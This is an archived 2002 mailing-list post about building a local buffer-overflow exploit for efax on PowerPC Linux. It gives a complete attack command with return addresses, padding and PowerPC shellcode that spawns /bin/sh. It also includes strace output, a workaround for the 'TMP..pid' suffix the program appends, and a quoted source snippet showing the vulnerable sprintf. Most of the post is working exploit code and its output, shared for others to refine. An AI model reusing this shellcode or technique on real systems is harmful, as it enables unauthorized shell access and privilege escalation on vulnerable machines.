I was playing with efax on ppc and it is REAL picky about how the shellcode is layed out... or it could be a problem with a char in my shellcode also. Regardless the layout is <returns><nops><shellcode> I have found I must have a trailing 0x2f if I try this method... otherwise the /sh gets lopped off. It then adds ..0 and then the pid of the process. This is obvious if you look at the code below provided by s1gnal_9. Here is some strace dumps and some Ugly perl from me so have fun. ( perl is NOT my forte) and sorry that my MUI sucks and chops all my lines up... [root@linuxppc root]# strace /usr/bin/efax -x `perl -e 'print "\x7f\xff\x25\xc0" x 274'``perl -e 'print "\x69\x69\x69\x69" x 14'``perl -e 'print"\x7c\xa5\x2a\x78\x40\x82\xff\xed\x7f\xe8\x02\xa6\x3b\xff\x01\x30\x38\x7f\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8\x3b\xc0\x01\x60\x7f\xc0\x2e\x70\x44\xff\xff\x02\x2f\x62\x69\x6e\x2f\x73\x68\x2f" x 1'``perl -e 'print "\x69\x69\x69\x69" x 14'` execve("/usr/bin/efax", ["/usr/bin/efax", "-x", "..( returns here) ÿ%Àÿ%Àiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii|¥*x@,ÿíè¦;ÿ08þô?aÿø?¡ÿü8?ÿø;À`À.pDÿÿ/bin/sh/iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii"], [/* 46 vars */]) = 0 ... write(2, "efax: 15:10 Error: can\'t open pr"..., 1279efax: 15:10 Error: can't open pre-lock file ( returns here ) %Àÿ%Àÿ%Àÿ%Àÿ%Àÿ%Àÿ%Àÿ%Àiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii|¥*x@,ÿíè¦;ÿ08þô?aÿø?¡ÿü8?ÿø;À`À.pDÿÿ/bin/sh/TMP..01350: File name too long ) = 1279 execve("/bin/sh/TMP..01350", ["/bin/sh/TMP..01350"]ptrace: umoven: Input/output error , [/* 0 vars */]) = -1 ENOTDIR (Not a directory) --- SIGILL (Illegal instruction) --- If you look here you can see that some how my execve got TMP..01350 appended to it and also a slash becasue obviously I put it there ... if i didn't add the / my execve would say execve("/bin/TMP..01350", ["/bin/TMP..01350"] ... instead I am left to work with the following... execve("/bin/sh/TMP..01350", ["/bin/sh/TMP..01350"]ptrace: umoven: Input/output error , [/* 0 vars */]) = -1 ENOTDIR (Not a directory) it is workable though *grin*...adjust the shellcode a bit and add TMP..pid on to the end of it ... mkdir /tmp/sh/ and copy a few binarys to TMP..0xxxx Have fun and if you don't maybe you can work out a better way. (I just thought of one but I am lazy ... it involves lopping off sh and just using TMP..pid for the bin). -KF +++ killed by SIGILL +++s1gnal_9 wrote: > More info about the overflow... > > Straight from efax src. > > <--snip---> > #define EFAX_PATH_MAX 1024 > <--/snip---> > > <--snip---> > char *p , buf [ EFAX_PATH_MAX ] = "" ; > <--/snip---> > > <--snip---> > sprintf ( buf , "%.*sTMP..%05d" , dirlen , fname , (int) pid ) ; > <--/snip---> > the sprinf above causes the overflow..
This archive was generated by hypermail 2b30 : Thu Jan 17 2002 - 23:09:34 PST